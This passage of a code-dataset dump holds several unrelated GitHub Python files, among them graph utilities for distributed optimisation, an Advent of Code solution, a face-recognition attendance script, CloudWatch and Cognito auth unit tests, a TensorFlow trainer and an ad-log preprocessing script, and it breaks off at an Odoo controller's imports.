r_t_current = r[:, i]\n g_current = f_info.f_gradient(agent_initial, Q_current, r_t_current)\n g[i*dim_a:(i+1)*dim_a, i*max_iter] = g_current\n f_current = f_info.f_value(agent_initial, Q_current, r_t_current)\n f[i, i*max_iter] = f_current\n\n x_star = np.zeros((dim_a,1))\n f_val = x_star.T @ Q_sum @ x_star + np.sum(r) * np.linalg.norm(x_star)\n\n agent = [0]*11\n agent = {'x': x, \n 'y_initial': y_initial, \n 'g': g, \n 'f': f,\n 'Q': Q, \n 'rT': r,\n 'x_star': x_star,\n 'f_star': f_val,\n 'lower_bound': lwb,\n 'upper_bound': upb,\n 'dimension': dim_a}\n \n return agent\n\ndef agent_slice(agent, agent_idx, current_step, max_iter, Ga):\n x = agent['x']\n g = agent['g']\n f = agent['f']\n Q = agent['Q']\n r = agent['rT']\n dim = agent['dimension']\n topo = Ga[:,agent_idx]\n N_Ga = np.size(Ga, 0)\n\n current_x = x[:, agent_idx*max_iter:(agent_idx+1)*max_iter]\n current_g = g[:, agent_idx*max_iter:(agent_idx+1)*max_iter]\n current_f = f[:, agent_idx*max_iter:(agent_idx+1)*max_iter]\n for i in range(N_Ga):\n if topo[i] != 0:\n current_x[i*dim:(i+1)*dim, current_step-1] = x[i*dim:(i+1)*dim, i*max_iter+current_step-1]\n current_g[i*dim:(i+1)*dim, current_step-1] = g[i*dim:(i+1)*dim, i*max_iter+current_step-1] \n current_f[i, current_step-1] = f[i, i*max_iter+current_step-1] \n else:\n current_x[i*dim:(i+1)*dim, current_step-1] = current_x[i*dim:(i+1)*dim, current_step-2]\n current_g[i*dim:(i+1)*dim,current_step-1] = current_g[i*dim:(i+1)*dim, current_step-2]\n current_f[i,current_step-1] = current_f[i,current_step-1] \n\n \n agent = [0]*6\n current_agent = {'x_memory': current_x, \n 'g_memory': current_g, \n 'f_memory': current_f,\n 'Q':Q[:, agent_idx*dim:(agent_idx+1)*dim], \n 'rT':r[:, agent_idx],\n 'topo': topo,\n }\n\n return current_agent\n\ndef Set_fully_connected(n):\n full_matrix = np.random.rand(n, n) # Generate random non-negative matrix\n full_matrix /= full_matrix.sum(axis=1)[:, np.newaxis] # Normalize rows to ensure the sum of each row is 1\n full_matrix /= full_matrix.sum(axis=0) # Normalize columns to ensure the sum of each column is 1\n return full_matrix\n\ndef find_longest_combination_in_different_rows_and_columns(positions):\n longest_combination = []\n\n for r in range(2, len(positions) + 1): # Start from pairs, up to the total number of positions\n for combination in combinations(positions, r): # Check if each point is in a different row and column \n if all(combination[i][0] != combination[j][0] and combination[i][1] != combination[j][1]\n for i in range(r) for j in range(i + 1, r)):\n longest_combination = combination\n\n return longest_combination\n\ndef GRPdur(n): # generate index\n p = np.arange(0, n) # Start with Identity permutation\n\n for k in range(n, 0, -1):\n r = np.random.randint(0, k) # random integer between 1 and k\n t = p[k-1]\n p[k-1] = p[r-1] # Swap(p(r),p(k)).\n p[r-1] = t\n\n return p\n\ndef create_Graph(n,idx_pre, T):\n positions_row, positions_col = np.where(idx_pre == T) # extract positions where the weights cannot be zero again\n # Generate a random doubly stochastic adjacency matrix\n c = np.random.rand(1, n)\n c = c / np.sum(c)\n weighted_adjacency_matrix = np.zeros((n,n))\n weighted_adjacency_matrix[range(n), range(n)] = c[0, 0] # assign diagnal\n if bool(np.size(positions_row) > 0): # there are positions that cannot be zero\n positions = list(zip(positions_row, positions_col))\n count = 1\n while bool(positions): # The list is not empty\n acceptable_postions = find_longest_combination_in_different_rows_and_columns(positions) # find positions in different row and col\n if count < n:\n if len(acceptable_postions) >= n:\n pos_to_assign = acceptable_postions[:n] # Choose the first n tuples \n p_r, p_c = zip(*pos_to_assign) # Separate x and y coordinates into two arrays\n p_r = np.array(p_r)\n p_c = np.array(p_c)\n weighted_adjacency_matrix[p_r, p_c] += c[0, count]\n count += 1\n set_a = set(positions) # delete used tuples in 'positions' list\n set_b = set(acceptable_postions)\n result = set_a.symmetric_difference(set_b)\n positions = list(result)\n else:\n pos_to_assign = acceptable_postions # Choose all tuples\n p_r, p_c = zip(*pos_to_assign) # Separate x and y coordinates into two arrays\n p_r = np.array(p_r)\n p_c = np.array(p_c) \n missing_elements_in_row = [element for element in range(n) if element not in p_r] # Find missing elements\n missing_elements_in_col = [element for element in range(n) if element not in p_c] # Find missing elements\n p_r = np.append(p_r, missing_elements_in_row, axis=0) # Append missing elements to the existing list\n p_c = np.append(p_c, missing_elements_in_col, axis=0) # Append missing elements to the existing list\n weighted_adjacency_matrix[p_r, p_c] += c[0, count]\n count += 1\n positions = []\n else:\n weighted_adjacency_matrix = Set_fully_connected(n)\n print(\"fully connected graph\")\n return weighted_adjacency_matrix\n \n for i in range(n-count-1, n):\n p_r = GRPdur(n) # row index\n p_c = p_r[::-1] # colum index\n weighted_adjacency_matrix[p_r, p_c] += c[0, i]\n\n else: # randomly selected doubly stochastic matrix without restrictions\n for i in range(1, n):\n p_r = GRPdur(n) # row index\n p_c = p_r[::-1] # colum index\n weighted_adjacency_matrix[p_r, p_c] += c[0, i]\n\n # update idx_pre\n idx_current = np.copy(idx_pre) # initialise idx_current\n idx_zero_new_row, idx_zero_new_col = np.where(weighted_adjacency_matrix == 0) # find idx of zero entries\n idx_current[idx_zero_new_row, idx_zero_new_col] += 1 # update idx of zero entries\n idx_reset_row, idx_reset_col = np.where(idx_pre == idx_current)\n idx_current[idx_reset_row, idx_reset_col] = 0\n \n return weighted_adjacency_matrix, idx_current\n\ndef update_graph(k, Na, T, idx_zero):\n if k == 2:\n Ga = 1/Na*np.ones((Na, Na))\n else:\n Ga, idx_zero = create_Graph(Na, idx_zero, T)\n return Ga, idx_zero\n\n #print('Graph is:\\n', Ga)\n #print('zero position matrix is:\\n', idx_zero)\n\ndef communication(Na, agent_all, k, max_iter, Ga):\n for i in range(Na):\n update = agent_slice(agent_all, i, k-1, max_iter, Ga)\n update_x = update['x_memory']\n update_g = update['g_memory']\n update_f = update['f_memory']\n x = agent_all['x']\n g = agent_all['g']\n f = agent_all['f']\n x[:, i*max_iter+k-1] = update_x[:, k-1]\n g[:, i*max_iter+k-1] = update_g[:, k-1]\n f[:, i*max_iter+k-1] = update_f[:, k-1]\n return agent_all\n \n\n \n\n\n\n\n\n","repo_name":"zty0312/Distributed-Cutting-Plane-Consensus","sub_path":"create_data.py","file_name":"create_data.py","file_ext":"py","file_size_in_byte":8918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"71643635707","text":"import numpy as np\nfrom astropy.table import QTable\nimport astropy.units as u\n\n# read in the Valencic et al. 2004 data and write the common format table\nif __name__ == \"__main__\":\n # get the Valencic04 results\n val04_dust = QTable.read(\"Valencic04/valencic04_datafile4.txt\", format=\"ascii.cds\")\n val04_fm = QTable.read(\"Valencic04/valencic04_datafile5.txt\", format=\"ascii.cds\")\n\n otab = QTable()\n otab[\"AV\"] = np.array(val04_dust[\"A(V)\"]) * u.mag\n otab[\"EBV\"] = np.array(val04_dust[\"E(B-V)\"]) * u.mag\n rv = np.array(val04_dust[\"R(V)\"])\n otab[\"RV\"] = rv\n\n otab[\"C1\"] = (np.array(val04_fm[\"c1/R(V)+1.0\"]) - 1.0) * rv\n otab[\"C2\"] = np.array(val04_fm[\"c2/R(V)\"]) * rv\n otab[\"C3\"] = np.array(val04_fm[\"c3/R(V)\"]) * rv\n otab[\"C4\"] = np.array(val04_fm[\"c4/R(V)\"]) * rv\n otab[\"x0\"] = np.array(val04_fm[\"x0\"]) / u.micron\n otab[\"gamma\"] = np.array(val04_fm[\"gamma\"]) / u.micron\n\n otab.write(\"val04_ensemble_params.dat\", format=\"ascii.ipac\", overwrite=True)\n","repo_name":"karllark/extinction_ensemble_props","sub_path":"data/process_val04.py","file_name":"process_val04.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"13415168712","text":"from pprint import pprint\nfrom collections import defaultdict, Counter\nfrom functools import cache\n\n\ndef readlines():\n with open(\"./input/day14.txt\") as f:\n for line in f.readlines():\n yield line.strip()\n\n\ndef pairs(s):\n for i in range(len(s)):\n yield s[i : i + 2]\n\n\ndef step(template, rules):\n ps = (s[0] + rules[s] + s[0] for s in pairs(template))\n return \"\".join((p[:-1] for p in ps))\n\n\ndef parse(lines):\n template = next(lines)\n next(lines)\n rules = defaultdict(str)\n for line in lines:\n pair, insertion = line.split(\" -> \")\n rules[pair] = insertion\n return template, rules\n\n\ndef solve_one():\n template, rules = parse(readlines())\n for _ in range(10):\n template = step(template, rules)\n counts = Counter(template)\n low = min(counts.values())\n high = max(counts.values())\n return high - low\n\n\ndef expand_counts(template, rules, n):\n @cache\n def expand_pair(pair, n):\n if n == 0 or pair not in rules:\n return Counter()\n else:\n return (\n expand_pair(pair[0] + rules[pair], n - 1)\n + Counter({rules[pair]: 1})\n + expand_pair(rules[pair] + pair[1], n - 1)\n )\n\n def full_expand(template, n):\n counts = Counter()\n prev = next(template)\n for c in template:\n counts += Counter({prev: 1})\n counts += expand_pair(prev + c, n)\n prev = c\n counts += Counter({prev: 1})\n return counts\n\n return full_expand((c for c in template), n)\n\n\ndef solve_two():\n template, rules = parse(readlines())\n counts = expand_counts(template, rules, 40)\n low = min(counts.values())\n high = max(counts.values())\n return high - low\n\n\nif __name__ == \"__main__\":\n pprint(solve_one())\n pprint(solve_two())\n","repo_name":"tommy/adventofcode","sub_path":"src/day14.py","file_name":"day14.py","file_ext":"py","file_size_in_byte":1854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"17635665657","text":"import face_recognition\r\nimport cv2\r\nimport numpy as np\r\nimport os\r\nfrom datetime import datetime\r\n\r\n\r\n #we import the images\r\npath = 'Attendence'\r\nimages = []\r\nclassNames = []\r\nmylist = os.listdir(path)\r\nprint(mylist)\r\n\r\nfor cls in mylist:\r\n currImg = cv2.imread(f'{path}/{cls}')\r\n images.append(currImg)\r\n classNames.append(os.path.splitext(cls)[0])\r\nprint(classNames)\r\n\r\n\r\n# we encoded the image\r\ndef Encodings(images):\r\n encodelist = []\r\n for img in images:\r\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\r\n encode = face_recognition.face_encodings(img)[0]\r\n encodelist.append(encode)\r\n return encodelist\r\n\r\ndef markingattendence(name):\r\n with open('attendecesheet.csv','r+') as f:\r\n mydatalist = f.readlines()\r\n namelist = []\r\n for line in mydatalist:\r\n entry = line.split(',')\r\n namelist.append(entry[0])\r\n if name not in namelist:\r\n now = datetime.now()\r\n dtstring = now.strftime('%H:%M:%S')\r\n f.writelines(f'\\n{name},{dtstring}')\r\n\r\n\r\n\r\nencodelistknown = Encodings(images)\r\nprint('Encoding Done')\r\n\r\ncap = cv2.VideoCapture(0)\r\n\r\nwhile True:\r\n success, img = cap.read()\r\n imgS = cv2.resize(img, (0, 0), None, 0.25, 0.25)\r\n imgS = cv2.cvtColor(imgS, cv2.COLOR_BGR2RGB)\r\n\r\n Facesincurrframe = face_recognition.face_locations(imgS)\r\n encodecurrframe = face_recognition.face_encodings(imgS,Facesincurrframe)\r\n\r\n for encodeface,faceloc in zip(encodecurrframe,Facesincurrframe):\r\n matches = face_recognition.compare_faces(encodelistknown,encodeface)\r\n facedis = face_recognition.face_distance(encodelistknown,encodeface)\r\n print(facedis)\r\n matchindex = np.argmin(facedis)\r\n\r\n if matches[matchindex]:\r\n name = classNames[matchindex].upper()\r\n print(name)\r\n y1,x2,y2,x1 = faceloc\r\n y1, x2, y2, x1 =y1*4,x2*4,y2*4,x1*4\r\n cv2.rectangle(img,(x1,y1),(x2,y2),(0,255,0),3)\r\n cv2.putText(img,name,(x1+6,y2-6),cv2.FONT_ITALIC,2,(255,255,255),2)\r\n markingattendence(name)\r\n\r\n\r\n cv2.imshow('webcam',img)\r\n cv2.waitKey(1)\r\n\r\n","repo_name":"akashrane/Automatic_FaceRecognition_Attendance_System","sub_path":"Attendence.py","file_name":"Attendence.py","file_ext":"py","file_size_in_byte":2254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"31611953467","text":"from tests import mock, BaseTestCase\n# from mock import Mock \nimport boto3\nimport base64\n# import placebo\n# import types\nimport logging\n\nimport check_cloudwatch_alarms\t\n\nclass TestCheckCloudWatchAlarms(BaseTestCase):\n\n OK=0\n WARNING=1\n CRITICAL=2\n UNKNOWN=3\n\n def test_filter_alarms(self):\n class MockAlarm:\n def __init__(self, name):\n self.name = name\n filter1 ='sky-cw.*staging'\n filter2 ='sky-cw.*production'\n alarms = [MockAlarm('sky-cw-addapp-ecs-staging-01')]\n self.assertEquals(1, len(check_cloudwatch_alarms.filter_alarms(alarms)))\n self.assertEquals(1, len(check_cloudwatch_alarms.filter_alarms(alarms, filter1)))\n alarms.append(MockAlarm('other-cw-addapp-ecs-staging-01'))\n self.assertEquals(1, len(check_cloudwatch_alarms.filter_alarms(alarms, filter1)))\n alarms.append(MockAlarm('sky-cw-text-addapp-ecs-staging-02'))\n self.assertEquals(2, len(check_cloudwatch_alarms.filter_alarms(alarms, filter1)))\n alarms.append(MockAlarm('sky-cw-text-addapp-ecs-production-02'))\n self.assertEquals(2, len(check_cloudwatch_alarms.filter_alarms(alarms, filter1)))\n self.assertEquals(1, len(check_cloudwatch_alarms.filter_alarms(alarms, filter2)))\n \n def test_check_status(self):\n \n alarms = [ ]\n cloudwatch = boto3.resource('cloudwatch')\n alarm = cloudwatch.Alarm('name')\n alarms.append(alarm)\n self.assertEquals(check_cloudwatch_alarms.CRITICAL, check_cloudwatch_alarms.check_status(alarms,\"ERROR\"))\n self.assertEquals(check_cloudwatch_alarms.WARNING, check_cloudwatch_alarms.check_status(alarms,\"ERROR\",True))\n\n self.assertEquals(check_cloudwatch_alarms.WARNING, check_cloudwatch_alarms.check_status(alarms,\"OK\"))\n alarms = [ ]\n self.assertEquals(check_cloudwatch_alarms.OK, check_cloudwatch_alarms.check_status(alarms,\"ERROR\"))\n \n def test_get_alarm_filter_expression(self):\n class MockArgs:\n alarmFilterExpressionEncoded = None\n alarmFilterExpression = None\n def __init__(self, alarmFilterExpression, alarmFilterExpressionEncoded):\n self.alarmFilterExpression = alarmFilterExpression\n self.alarmFilterExpressionEncoded = alarmFilterExpressionEncoded\n expression = \"sky-cw.*staging\" \n exprEncoded = base64.b64encode(expression)\n print(\"expr staging:\" + expression)\n print(\"exprEncoded staging:\" + exprEncoded)\n print(\"expr production:\" + \"sky-cw.*production\")\n print(\"exprEncoded production:\" + base64.b64encode(\"sky-cw.*production\"))\n #exprEncoded staging:c2t5LWN3LipzdGFnaW5n\n #exprEncoded production:c2t5LWN3Lipwcm9kdWN0aW9u\n \n args = MockArgs(None,exprEncoded)\n self.assertEquals(expression, check_cloudwatch_alarms.get_alarm_filter_expression(args))\n args = MockArgs(expression, None)\n self.assertEquals(expression, check_cloudwatch_alarms.get_alarm_filter_expression(args))\n","repo_name":"skyscrapers/monitoring-plugins","sub_path":"tests/unit/test_check_cloudwatch_alarms.py","file_name":"test_check_cloudwatch_alarms.py","file_ext":"py","file_size_in_byte":3070,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"6"} +{"seq_id":"4904942183","text":"import tensorflow as tf\nimport numpy as np\n\nclass Trainer(object):\n def __init__(self, config, model_obj):\n self.config = config\n self.model = model_obj\n\n def get_train_op(self, loss, params, start_learning_rate, base_learning_rate, warmup_steps,hidden_size,\n l2_rate=0.0001, clip_gradient_norm=5,\n optimizer='adam',\n scope=\"\"):\n # add training op\n with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):\n self.global_step = tf.train.get_or_create_global_step()\n\n loss_l2 = tf.add_n([tf.nn.l2_loss(p) for p in params]) * l2_rate\n loss += loss_l2\n\n slope = (base_learning_rate - start_learning_rate) / warmup_steps\n warmup_rate = slope * tf.cast(self.global_step,\n tf.float32) + start_learning_rate\n\n if self.config.decay_learning_rate:\n decay_learning_rate = tf.train.exponential_decay(base_learning_rate, self.global_step,\n 1000, 0.98, staircase=False)\n # decay_learning_rate = tf.train.cosine_decay_restarts(base_learning_rate, self.global_step,\n # 1000)\n else:\n decay_learning_rate = base_learning_rate\n\n learning_rate = tf.where(self.global_step < warmup_steps, warmup_rate,\n decay_learning_rate)\n\n # warmup_steps = tf.to_float(warmup_steps)\n # step = tf.to_float(tf.train.get_or_create_global_step())\n #\n # learning_rate = base_learning_rate * (hidden_size ** -0.5)\n # # Apply linear warmup\n # learning_rate *= tf.minimum(1.0, step / warmup_steps)\n # # Apply rsqrt decay\n # learning_rate *= tf.rsqrt(tf.maximum(step, warmup_steps))\n\n\n if optimizer == 'adam':\n opt = tf.contrib.opt.LazyAdamOptimizer(\n #weight_decay=l2_rate,\n learning_rate=learning_rate,\n beta1=self.model.hparams.optimizer_adam_beta1,\n beta2=self.model.hparams.optimizer_adam_beta2,\n epsilon=self.model.hparams.optimizer_adam_epsilon)\n elif optimizer == 'rmsprop':\n opt = tf.train.RMSPropOptimizer(learning_rate=learning_rate)\n elif optimizer == 'sgd':\n opt = tf.train.GradientDescentOptimizer(learning_rate=learning_rate)\n\n\n grads_and_vars = opt.compute_gradients(loss, params)\n gradients, variables = zip(*grads_and_vars)\n if clip_gradient_norm > 0:\n gradients, _ = tf.clip_by_global_norm(gradients, clip_gradient_norm)\n self.param_norm = tf.global_norm(params)\n\n # Include batch norm mean and variance in gradient descent updates\n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n updates = opt.apply_gradients(zip(gradients, params), global_step=self.global_step)\n\n # Create an ExponentialMovingAverage object\n ema = tf.train.ExponentialMovingAverage(decay=0.9999)\n\n with tf.control_dependencies([updates]+update_ops):\n training_op = ema.apply(params)\n\n return training_op, learning_rate\n\n\n def train(self):\n\n update_op, scaffold, train_output_dic, _, _ = self.build_train_graph()\n with tf.train.MonitoredTrainingSession(checkpoint_dir=self.config.save_dir, scaffold=scaffold,\n config=tf.ConfigProto(\n allow_soft_placement=True, log_device_placement=True)\n ) as sess:\n #tf.logging.info(\"start training:\")\n #tf.logging.info(self.config.training_iterations)\n for i in np.arange(self.config.training_iterations):\n sess.run(update_op)\n\n\n\n def get_data_itaratoes(self):\n raise NotImplementedError()\n\n def build_train_graph(self):\n raise NotImplementedError()\n\n def build_eval_graph(self):\n raise NotImplementedError()","repo_name":"samiraabnar/SolutionDistillation","sub_path":"distill/pipelines/basic_trainer.py","file_name":"basic_trainer.py","file_ext":"py","file_size_in_byte":3905,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"22137942871","text":"import pandas as pd\nimport numpy as np\nfrom random import uniform\nfrom collections import Counter\n\nMODEL_BASED = \"industry_type\"\nDATA_PATH = \"data/formatted/\"\n\nraw_path_file_ad_log = \"data/raw/ad_log.tsv.0063_part_00.gz\"\nraw_path_file_campaign = \"data/raw/campaign_data_hust_2018_autumn_eng.csv\"\nraw_path_file_url = \"data/raw/url_category_hust_2018_autumn.csv\"\n\nF_PATH_FILE_AD_LOG = \"data/formatted/ad_log.csv\"\nF_PATH_FILE_CAMPAIGN = \"data/formatted/campaign_2018_autumn.csv\"\n\nad_log_header = [\"view_datetime\", \"user_id\", \"purl_subdomain\", \"purl_base\", \"os\", \"device\", \"source_log_nm\",\n \"advertiser_id\", \"campaign_id\", \"flight_id\", \"ip_address\"]\n\n#### 1. Handle biggest data file\n# # Handle ad_log_file, read whole file but separate chunks\n# chunksize = 100000\n# df_iter = pd.read_csv(raw_path_file_ad_log, delimiter = \"\\t\", chunksize=chunksize, iterator=True)\n# for iter_num, chunk in enumerate(df_iter, 0):\n# print(\"Processing chunk: \", iter_num)\n# saved = chunk[chunk[\"advertiser_id\"]!= 0]\n# saved.to_csv(F_PATH_FILE_AD_LOG, header=None, sep=',', mode='a', index=False, encoding='utf-8')\n\n\n## Handle campaign_file\n# df_cp = pd.read_csv(raw_path_file_campaign, header=0, delimiter = ',', error_bad_lines=False)\n# # ,No.,FlightID,advertiser_id,campaign_id,Campaign Name,キャンペーン名,Line Item Name,ラインアイテム名,Type of industry,業種,RTB) campaign merchandise,RTB)キャンペーン商材,OTrans,RTB)キャンペーン商材(詳細)\n# cp_header = [\"flight_id\", \"advertiser_id\", \"campaign_id\", \"campaign_name_eng\", \"campaign_name_jp\",\n# \"viewer_type_eng\", \"viewer_type_jp\", \"industry_type_eng\", \"industry_type_jp\",\n# \"rtb_campaign_material_eng\", \"rtb_campaign_material_jp\", \"campaign_product_eng\", \"campaign_product_details_jp\"]\n# df_cp = df_cp.iloc[:, 2:]\n# df_cp.to_csv(F_PATH_FILE_CAMPAIGN, header=cp_header, sep=',', index=False, encoding='utf-8')\n\n\n#### 2. Join tables\ndf1 = pd.read_csv(F_PATH_FILE_AD_LOG, delimiter = ',', names=ad_log_header, error_bad_lines=False)\ndf2 = pd.read_csv(F_PATH_FILE_CAMPAIGN, delimiter = ',', header=0, error_bad_lines=False)\n\ndf1[\"flight_id\"] = pd.to_numeric(df1[\"flight_id\"], errors=\"coerce\") # Error when merging files\ndf1 = df1[df1[\"flight_id\"] != None]\n\ndf_join = df1.join(df2[['flight_id', 'industry_type_eng']].set_index('flight_id'), on='flight_id')\ndf_join = df_join.reset_index()\n\nif MODEL_BASED == \"industry_type\":\n df_join = df_join[df_join['industry_type_eng'].notnull()]\ndf = df_join.iloc[:, 1:]\ndf = df.reset_index(drop=True)\nprint(df.head(10))\n\n#### 3. Handle datetime\ndef func_convert_time(a):\n if 0 <= a and a <=5:\n return 0 # Sleep\n elif 6 == a:\n return 1 # Breakfast\n elif 7 == a:\n return 2 # Commute\n elif 8 <= a and a <= 11:\n return 3 # Office hours\n elif 12 <= a and a <= 13:\n return 4 # Lunch\n elif 14 <= a and a <= 17:\n return 5 # Office hours\n elif a == 18:\n return 6 # Commute\n elif a == 19:\n return 7 # Dinner\n elif 20 <= a and a < 24:\n return 8 # Resting\n else:\n return -1\n\nhours = pd.DatetimeIndex(df[\"view_datetime\"]).hour\ndf_hour1 = pd.DataFrame(data={\"view_hour\": hours}, index=df.index, dtype=np.int64)\ndf_hour2 = pd.to_numeric(df_hour1[\"view_hour\"].apply(func_convert_time))\ndf = pd.concat([df, df_hour2], axis=1)\nprint(df.tail(100))\nprint(\"Number of records: \", df.shape[0])\n\n#### 4. Filter records which are appear at least n times by the same user\n#df = df[df.duplicated(subset=[\"user_id\"], keep=False)] # n >= 2\ncounts = Counter(df[\"user_id\"])\ndf = df[df[\"user_id\"].isin([key for key in counts if counts[key] > 5])] # n > 5\nprint(\"Number of records after remove users: \", df.shape[0])\n\n\n#### 5. Handle ID collumns\nuser_labels, unique_users = pd.factorize(df[\"user_id\"])\nprint(\"Number of uniques user is %d\" %len(unique_users))\nprint(unique_users[:5])\n\nadvertiser_id_labels, unique_advertiser_id = pd.factorize(df[\"advertiser_id\"])\nprint(\"Number of uniques advertiser_id is %d\" %len(unique_advertiser_id))\nprint(unique_advertiser_id[:5])\n\ncampaign_id_labels, unique_campaign_id = pd.factorize(df[\"campaign_id\"])\nprint(\"Number of uniques campaign_id is %d\" %len(unique_campaign_id))\nprint(unique_campaign_id[:5])\n\nflight_id_labels, unique_flight_id = pd.factorize(df[\"flight_id\"])\nprint(\"Number of uniques flight_id is %d\" %len(unique_flight_id))\nprint(unique_flight_id[:5])\n\n\n\n#### 6. Handle categorical collumns\nsubdomain_labels, uniques_subdomain = pd.factorize(df['purl_subdomain'])\nprint(\"Number of uniques purl_subdomain is %d\" %len(uniques_subdomain))\nprint(uniques_subdomain[:5])\n\npurl_base_labels, uniques_purl_base = pd.factorize(df['purl_base'])\nprint(\"Number of uniques purl_base is %d\" %len(uniques_purl_base))\nprint(uniques_purl_base[:5])\n\nos_labels, unique_os = pd.factorize(df['os'])\nprint(\"Number of unique os is %d\" %len(unique_os))\nprint(unique_os)\n\ndevice_labels, unique_device = pd.factorize(df['device'])\nprint(\"Number of unique device is %d\" %len(unique_device))\nprint(unique_device)\n\nsource_log_labels, unique_source_log = pd.factorize(df['source_log_nm'])\nprint(\"Number of unique source_log is %d\" %len(unique_source_log))\nprint(unique_source_log)\n\nip_address_labels, unique_ip_address = pd.factorize(df['ip_address'])\nprint(\"Number of unique ip_address is %d\" %len(unique_ip_address))\nprint(unique_ip_address)\n\nindustry_type_labels, unique_industry_type = pd.factorize(df['industry_type_eng'])\nprint(\"Number of unique industry_type_eng is %d\" %len(unique_industry_type))\nprint(unique_industry_type)\n\n# Re-feature\ndf['user_id'] = user_labels\ndf['advertiser_id'] = advertiser_id_labels\ndf['campaign_id'] = campaign_id_labels\ndf['flight_id'] = flight_id_labels\ndf['purl_subdomain'] = subdomain_labels\ndf['purl_base'] = purl_base_labels\ndf['os'] = os_labels\ndf['device'] = device_labels\ndf['source_log_nm'] = source_log_labels\ndf['ip_address'] = ip_address_labels\ndf['industry_type_eng'] = industry_type_labels\n\n\ndf = df.sort_values(by=[\"user_id\"]).reset_index(drop=True) # sort by user_id then reset index\nprint(len(df[\"user_id\"].unique())) # 445 unique users with number of appearance at least 6 times\n\n\n#### 7. Building matrix based on industry_type and advertiser_id\nlen_user = len(df[\"user_id\"].unique())\nlen_it = 9 * len(unique_industry_type)\nlen_ai = 9 * len(unique_advertiser_id)\n\nmat_it = np.zeros((len_user, len_it))\nmat_ai = np.zeros((len_user, len_ai))\nfor id, u in df.iterrows():\n user_pos = u[\"user_id\"]\n view_hour = u[\"view_hour\"]\n industry_type = u[\"industry_type_eng\"]\n advertiser_id = u[\"advertiser_id\"]\n item_pos1 = view_hour * len(unique_industry_type) + industry_type\n item_pos2 = view_hour * len(unique_advertiser_id) + advertiser_id\n mat_it[user_pos][item_pos1] += 1\n mat_ai[user_pos][item_pos2] += 1\n\nprint(mat_it)\nprint(mat_ai)\n\nnp.savetxt(DATA_PATH + \"mat_it.csv\", mat_it, fmt='%d', delimiter=',', newline='\\n', comments='')\nnp.savetxt(DATA_PATH + \"mat_ai.csv\", mat_ai, fmt='%d', delimiter=',', newline='\\n', comments='')\n\ntrain_file_it = []\ntest_file_it = []\ntrain_file_ai = []\ntest_file_ai = []\n\n#### 8. Building file user_id, item_id, access_counting\nfor i in range(len_user):\n for j in range(len_it):\n if uniform(0, 1) < 0.7:\n train_file_it.append([i, j, mat_it[i][j]])\n else:\n test_file_it.append([i, j, mat_it[i][j]])\n\n for k in range(len_ai):\n if uniform(0, 1) < 0.7:\n train_file_ai.append([i, k, mat_ai[i][k]])\n else:\n test_file_ai.append([i, k, mat_ai[i][k]])\n\nnp.savetxt(DATA_PATH + \"train_file_it.csv\", np.array(train_file_it), fmt='%d', delimiter=',', newline='\\n', comments='')\nnp.savetxt(DATA_PATH + \"test_file_it.csv\", np.array(test_file_it), fmt='%d', delimiter=',', newline='\\n', comments='')\nnp.savetxt(DATA_PATH + \"train_file_ai.csv\", np.array(train_file_ai), fmt='%d', delimiter=',', newline='\\n', comments='')\nnp.savetxt(DATA_PATH + \"test_file_ai.csv\", np.array(test_file_ai), fmt='%d', delimiter=',', newline='\\n', comments='')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"thieu1995/adv_recom_sys","sub_path":"preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":8191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"24917708235","text":"from unittest import mock\n\nimport spp_cognito_auth\n\n\n@mock.patch.object(spp_cognito_auth.Auth, \"logged_in\")\ndef test_required_auth_logged_in(mock_logged_in, client):\n mock_logged_in.return_value = True\n response = client.get(\"/\")\n assert response.status_code == 200\n assert response.data == b\"Hello, World!\"\n\n\n@mock.patch.object(spp_cognito_auth.Auth, \"logged_in\")\ndef test_required_auth_logged_out(mock_logged_in, client, flask_app):\n mock_logged_in.return_value = False\n response = client.get(\"/\")\n assert response.status_code == 302\n assert response.headers[\"Location\"].startswith(\n \"https://test-cognito-domain.test.com/login?\"\n + \"client_id=test-client-id&\"\n + \"response_type=code&\"\n + \"scope=aws.cognito.signin.user.admin+email+openid+phone+profile&\"\n + \"redirect_uri=http://test-app-host.test.com/auth/callback&\"\n + \"state=\"\n )\n assert flask_app.auth.get_redirect() == \"http://localhost/\"\n\n\n@mock.patch.object(spp_cognito_auth.Auth, \"logged_in\")\n@mock.patch.object(spp_cognito_auth.Auth, \"match_role\")\ndef test_required_roles_authorised(mock_match_role, mock_logged_in, client):\n mock_match_role.return_value = True\n mock_logged_in.return_value = True\n response = client.get(\"/test-roles\")\n assert response.status_code == 200\n assert response.data == b\"Welcome to the Role endpoint!\"\n\n\n@mock.patch.object(spp_cognito_auth.Auth, \"logged_in\")\n@mock.patch.object(spp_cognito_auth.Auth, \"match_role\")\ndef test_required_roles_not_authorised(mock_match_role, mock_logged_in, client):\n mock_match_role.return_value = False\n mock_logged_in.return_value = True\n response = client.get(\"/test-roles\")\n assert response.status_code == 403\n","repo_name":"ONSdigital/spp-cognito-auth","sub_path":"tests/test_decorator.py","file_name":"test_decorator.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"32911538129","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom werkzeug.exceptions import Forbidden, NotFound\nfrom odoo import http, tools, fields\nfrom odoo.http import request\nfrom odoo.addons.sale.controllers.product_configurator import ProductConfiguratorController\nimport logging\nfrom odoo.addons.http_routing.models.ir_http import slug\nfrom odoo.addons.website.controllers.main import QueryURL\nfrom odoo.addons.website_sale.controllers.main import TableCompute\nfrom 